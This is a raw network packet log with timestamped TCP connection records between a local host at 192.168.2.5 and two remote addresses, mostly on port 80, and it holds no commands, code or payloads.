Aug 31, 2024 15:44:17.867743015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867757082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867760897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867769003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867777109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867790937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867793083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867799044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867805004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867815018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867841959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867855072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868402958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868451118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868520021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868530035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868535042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868544102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868570089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868583918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868593931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868603945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868613005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868638992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868652105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868751049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868762016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868771076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868781090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868791103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868797064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868801117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868808985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868813038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868823051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868832111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868835926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868840933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868846893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868861914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868866920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868879080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868880987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868890047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868892908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868916988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868928909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868931055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868957043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.868976116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.868990898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869035959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869046926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869055986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869074106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869076014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869086981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869097948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869101048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869110107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869112968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869128942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869148016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869184971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869194984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869204044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869224072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869234085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869235039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869246960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869256020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869273901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869280100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869292974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869302988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869340897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869359970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869369984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869385958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869395018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869405031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869411945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869435072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869435072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869467020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869476080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869483948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869507074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869524956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869678974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869695902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869707108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869735003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869746923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869822025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869832993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869842052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869852066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869862080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869867086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869883060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869893074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869905949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869914055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869914055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869923115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869925976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869944096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869946957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869955063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869962931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869966984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869976997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869982958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.869987965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869998932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.869998932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870009899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870012045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870022058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870033026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870033979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870043039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870050907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870064974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870064974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870075941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870080948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870086908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870096922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870109081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870112896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870120049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870130062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870134115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870146036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870150089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870163918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870176077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870181084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870196104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870207071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870218992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870229959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870235920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870251894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870270014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.870276928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.870317936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.888128996 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.924004078 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.928788900 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.957818031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957829952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957840919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957875013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.957880974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957891941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957895041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.957902908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957912922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.957935095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.957946062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958095074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958105087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958116055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958153009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958153009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958168030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958178997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958195925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958204985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958211899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958214998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958240986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958242893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958261013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958280087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958437920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958448887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958457947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958473921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958481073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958484888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958489895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958491087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958498001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958502054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958508015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958513975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958524942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958529949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958539009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958555937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.958570957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958589077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.958596945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959129095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959139109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959147930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959176064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959181070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959186077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959196091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959196091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959207058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959209919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959224939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959248066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959290028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959300995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959310055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959326029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959331036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959336996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959347963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959350109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959363937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959366083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959373951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959384918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959388971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959399939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959408998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959414005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959419012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959429026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959429979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959448099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959451914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959461927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959469080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959470987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959471941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959476948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959484100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959491968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959496975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959506989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959522009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959541082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959621906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959633112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959647894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959672928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959682941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959682941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959693909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959705114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959714890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959722042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959726095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.959738970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959752083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.959774017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960514069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960524082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960534096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960541964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960562944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960572004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960577965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960583925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960602045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960607052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960619926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960622072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960628986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960633993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960650921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960654020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960661888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960661888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960674047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960675955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960688114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960697889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960699081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960712910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960714102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960724115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960726976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960737944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960737944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960747957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960757971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960758924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960768938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.960778952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960797071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.960819960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961585999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961633921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961639881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961644888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961672068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961683989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961704969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961714983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961734056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961743116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961746931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961755037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961771011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961771965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961781025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961783886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961791039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961802006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961803913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961812019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961827040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961842060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961854935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.961888075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961898088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.961935043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962352991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962425947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962434053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962449074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962460041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962470055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962471008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962481976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962490082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962500095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962522030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962523937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962537050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962549925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962558031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962563038 CEST	80	49727	52.212.52.84	192.168.2.5
